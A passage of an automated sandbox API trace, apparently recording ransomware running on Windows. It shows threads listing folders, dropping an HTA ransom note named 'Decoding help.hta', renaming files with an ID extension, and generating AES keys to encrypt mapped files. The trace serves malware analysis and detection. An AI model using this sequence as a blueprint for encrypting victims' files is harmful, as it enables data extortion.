lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\Microsoft.VisualStudio.Tools.Applications.Contract.v10.0.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\contracts\\microsoft.visualstudio.tools.applications.contract.v10.0.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.445] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\Microsoft.VisualStudio.Tools.Applications.Contract.v10.0.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\contracts\\microsoft.visualstudio.tools.applications.contract.v10.0.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x538 [0058.445] CreateFileMappingA (hFile=0x538, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xc5c [0058.445] CryptAcquireContextA (in: phProv=0x2735fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x2735fcec*=0x2aac64c8) returned 1 [0060.218] CryptGenKey (in: hProv=0x2aac64c8, Algid=0x6610, dwFlags=0x1, phKey=0x2735fce8 | out: phKey=0x2735fce8*=0x5fca8a0) returned 1 [0060.218] CryptExportKey (in: hKey=0x5fca8a0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x2735fbe4, pdwDataLen=0x2735fce4 | out: pbData=0x2735fbe4*, pdwDataLen=0x2735fce4*=0x2c) returned 1 [0060.218] MapViewOfFile (hFileMappingObject=0xc5c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5fa0) returned 0x6da0000 Thread: id = 840 os_tid = 0x9d8 [0054.588] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\*.*", lpFindFileData=0x2749fd30 | out: lpFindFileData=0x2749fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x583906f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd60f4a00, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd60f4a00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8550 [0055.517] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0055.517] FindNextFileW (in: hFindFile=0x5d8550, lpFindFileData=0x2749fd30 | out: lpFindFileData=0x2749fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x583906f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd60f4a00, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd60f4a00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.517] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0055.517] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0055.517] FindNextFileW (in: hFindFile=0x5d8550, lpFindFileData=0x2749fd30 | out: lpFindFileData=0x2749fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a612c00, ftCreationTime.dwHighDateTime=0x1cb6585, ftLastAccessTime.dwLowDateTime=0xd5f9dda0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x6a612c00, ftLastWriteTime.dwHighDateTime=0x1cb6585, nFileSizeHigh=0x0, nFileSizeLow=0x89b8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.VisualStudio.Tools.Applications.HostAdapter.v10.0.dll", cAlternateFileName="MIE07F~1.DLL")) returned 1 [0055.518] lstrcpyW (in: lpString1=0x2a6c80c0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\*.*" [0055.518] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\*.*") returned 97 [0055.518] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\Decoding help.hta" [0055.518] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\hostsideadapters\\decoding help.hta")) returned 0xffffffff [0055.518] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\hostsideadapters\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7bc [0056.933] WriteFile (in: hFile=0x7bc, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2749fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2749fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.447] CloseHandle (hObject=0x7bc) returned 1 [0058.447] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.447] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Microsoft.VisualStudio.Tools.Applications.HostAdapter.v10.0.dll") returned -1 [0058.447] lstrlenW (lpString="Microsoft.VisualStudio.Tools.Applications.HostAdapter.v10.0.dll") returned 63 [0058.447] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0058.447] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\*.*" [0058.447] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\*.*") returned 97 [0058.447] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\", lpString2="Microsoft.VisualStudio.Tools.Applications.HostAdapter.v10.0.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\Microsoft.VisualStudio.Tools.Applications.HostAdapter.v10.0.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\Microsoft.VisualStudio.Tools.Applications.HostAdapter.v10.0.dll" [0058.447] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\Microsoft.VisualStudio.Tools.Applications.HostAdapter.v10.0.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\Microsoft.VisualStudio.Tools.Applications.HostAdapter.v10.0.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\Microsoft.VisualStudio.Tools.Applications.HostAdapter.v10.0.dll" [0058.447] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\Microsoft.VisualStudio.Tools.Applications.HostAdapter.v10.0.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\Microsoft.VisualStudio.Tools.Applications.HostAdapter.v10.0.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\Microsoft.VisualStudio.Tools.Applications.HostAdapter.v10.0.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0058.447] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\Microsoft.VisualStudio.Tools.Applications.HostAdapter.v10.0.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\hostsideadapters\\microsoft.visualstudio.tools.applications.hostadapter.v10.0.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\Microsoft.VisualStudio.Tools.Applications.HostAdapter.v10.0.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\hostsideadapters\\microsoft.visualstudio.tools.applications.hostadapter.v10.0.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.449] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\Microsoft.VisualStudio.Tools.Applications.HostAdapter.v10.0.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\hostsideadapters\\microsoft.visualstudio.tools.applications.hostadapter.v10.0.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7bc [0058.449] CreateFileMappingA (hFile=0x7bc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xc64 [0058.449] CryptAcquireContextA (in: phProv=0x2749fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x2749fcec*=0x2aac6550) returned 1 [0060.219] CryptGenKey (in: hProv=0x2aac6550, Algid=0x6610, dwFlags=0x1, phKey=0x2749fce8 | out: phKey=0x2749fce8*=0x5e2930) returned 1 [0060.219] CryptExportKey (in: hKey=0x5e2930, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x2749fbe4, pdwDataLen=0x2749fce4 | out: pbData=0x2749fbe4*, pdwDataLen=0x2749fce4*=0x2c) returned 1 [0060.219] MapViewOfFile (hFileMappingObject=0xc64, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x89a0) returned 0x78d0000 Thread: id = 841 os_tid = 0x3c4 [0054.600] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\*.*", lpFindFileData=0x275dfd30 | out: lpFindFileData=0x275dfd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6716f0 [0054.600] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0054.600] FindNextFileW (in: hFindFile=0x6716f0, lpFindFileData=0x275dfd30 | out: lpFindFileData=0x275dfd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.600] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0054.600] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0054.600] FindNextFileW (in: hFindFile=0x6716f0, lpFindFileData=0x275dfd30 | out: lpFindFileData=0x275dfd30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x8a1f1b86, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x8a1f1b86, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0xab, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0054.600] lstrcpyW (in: lpString1=0x2a820628, lpString2="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\*.*") returned="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\*.*" [0054.600] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\*.*") returned 48 [0054.600] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\Decoding help.hta") returned="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\Decoding help.hta" [0054.600] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\Decoding help.hta" (normalized: "c:\\users\\public\\recorded tv\\sample media\\decoding help.hta")) returned 0xffffffff [0054.601] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\Decoding help.hta" (normalized: "c:\\users\\public\\recorded tv\\sample media\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7b8 [0056.933] WriteFile (in: hFile=0x7b8, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x275dfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x275dfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.450] CloseHandle (hObject=0x7b8) returned 1 [0058.450] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.450] lstrcmpiW (lpString1="Decoding help.hta", lpString2="desktop.ini") returned -1 [0058.450] lstrlenW (lpString="desktop.ini") returned 11 [0058.450] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\*.*") returned="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\*.*" [0058.450] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\*.*") returned 48 [0058.451] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\", lpString2="desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini") returned="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini" [0058.451] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini") returned="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini" [0058.451] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" [0058.451] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini" (normalized: "c:\\users\\public\\recorded tv\\sample media\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\public\\recorded tv\\sample media\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.451] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\public\\recorded tv\\sample media\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7b8 [0058.451] CreateFileMappingA (hFile=0x7b8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xc6c [0058.451] CryptAcquireContextA (in: phProv=0x275dfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x275dfcec*=0x2aac65d8) returned 1 [0060.220] CryptGenKey (in: hProv=0x2aac65d8, Algid=0x6610, dwFlags=0x1, phKey=0x275dfce8 | out: phKey=0x275dfce8*=0x5e28f0) returned 1 [0060.220] CryptExportKey (in: hKey=0x5e28f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x275dfbe4, pdwDataLen=0x275dfce4 | out: pbData=0x275dfbe4*, pdwDataLen=0x275dfce4*=0x2c) returned 1 [0060.220] MapViewOfFile (hFileMappingObject=0xc6c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa0) returned 0x78e0000 Thread: id = 842 os_tid = 0x9dc [0054.603] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\*.*", lpFindFileData=0x2771fd30 | out: lpFindFileData=0x2771fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671a70 [0055.682] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0055.682] FindNextFileW (in: hFindFile=0x671a70, lpFindFileData=0x2771fd30 | out: lpFindFileData=0x2771fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.682] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0055.682] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0055.682] FindNextFileW (in: hFindFile=0x671a70, lpFindFileData=0x2771fd30 | out: lpFindFileData=0x2771fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0055.682] FindClose (in: hFindFile=0x671a70 | out: hFindFile=0x671a70) returned 1 Thread: id = 843 os_tid = 0x9c8 [0054.606] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\*.*", lpFindFileData=0x2785fd30 | out: lpFindFileData=0x2785fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671a70 [0055.683] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0055.683] FindNextFileW (in: hFindFile=0x671a70, lpFindFileData=0x2785fd30 | out: lpFindFileData=0x2785fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.683] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0055.683] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0055.683] FindNextFileW (in: hFindFile=0x671a70, lpFindFileData=0x2785fd30 | out: lpFindFileData=0x2785fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0055.683] FindClose (in: hFindFile=0x671a70 | out: hFindFile=0x671a70) returned 1 Thread: id = 844 os_tid = 0x924 [0054.608] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\*.*", lpFindFileData=0x2799fd30 | out: lpFindFileData=0x2799fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1fb3099, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x1fff35a, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x1fff35a, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671a70 [0055.683] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0055.683] FindNextFileW (in: hFindFile=0x671a70, lpFindFileData=0x2799fd30 | out: lpFindFileData=0x2799fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1fb3099, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x1fff35a, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x1fff35a, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.684] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0055.684] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0055.684] FindNextFileW (in: hFindFile=0x671a70, lpFindFileData=0x2799fd30 | out: lpFindFileData=0x2799fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1fd91f9, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x1fd91f9, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x12c4d000, ftLastWriteTime.dwHighDateTime=0x1cb85c9, nFileSizeHigh=0x0, nFileSizeLow=0xb17190, dwReserved0=0x0, dwReserved1=0x0, cFileName="mpasbase.vdm", cAlternateFileName="")) returned 1 [0055.856] lstrcpyW (in: lpString1=0x5c90388, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\*.*" [0055.857] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\*.*") returned 107 [0055.857] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\Decoding help.hta" [0055.857] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\decoding help.hta")) returned 0x2020 Thread: id = 845 os_tid = 0x4b0 [0054.626] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\*.*", lpFindFileData=0x27adfd30 | out: lpFindFileData=0x27adfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd6e27e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd6e27e0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671cf0 